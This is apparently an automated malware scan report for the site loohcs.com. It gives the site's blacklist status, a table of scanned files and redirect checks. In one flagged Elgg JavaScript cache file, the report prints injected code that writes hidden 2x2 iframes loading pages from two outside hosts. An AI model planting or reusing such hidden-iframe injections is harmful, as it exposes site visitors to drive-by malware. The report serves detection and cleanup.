Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=loohcs.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://loohcs.com/ | 200 OK Content-Length: 7396 Content-Type: text/html | clean |
http://loohcs.com/vendors/jquery/jquery-1.6.4.min.js | 403 Forbidden Content-Length: 355 Content-Type: text/html | clean |
http://loohcs.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://loohcs.com/vendors/jquery/jquery-ui-1.8.16.min.js | 200 OK Content-Length: 201875 Content-Type: application/javascript | clean |
http://loohcs.com/cache/js/default/elgg.1410278099.js | 200 OK Content-Length: 68289 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://pometra.com/ehes.html?j=1337692></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1337692></iframe>'); var sprintf = (function() { function get_type(variable) { return Object.prototype.toString.call(variable).slice(8, -1).t data: data, success: function(json) { var river = $('.elgg-list-river'); if (river.length < 1) { river.append(json.output); } else { river.prepend($(json.output).find('li:first')); }; form.find('textarea').val(''); $("#thewire-characters-remaining span").html("140"); } }); e.preventDefault(); }; elgg.register_hook_handler('init', 'system', elgg.river.update.init); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://pometra.com/ehes.html?j=1337692 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://pometra.com/ehes.html?j=1337692> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1337692 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1337692> | ||
http://loohcs.com/javascript.js | 404 Not Found Content-Length: 330 Content-Type: text/html | clean |
http://loohcs.com/mod/business/vendors/js/jquery.sudoSlider.2.1.4.min.js | 200 OK Content-Length: 9038 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: loohcs.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 15:24:40 GMT
Pragma: no-cache
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: Elgg=1fc2ac4e4e39046856b5071ae71039c2; path=/
GET / HTTP/1.1
Host: loohcs.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 12 Sep 2014 15:24:40 GMT
Pragma: no-cache
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: Elgg=1fc2ac4e4e39046856b5071ae71039c2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: loohcs.com
Referer: http://www.google.com/search?q=loohcs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: loohcs.com
Referer: http://www.google.com/search?q=loohcs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.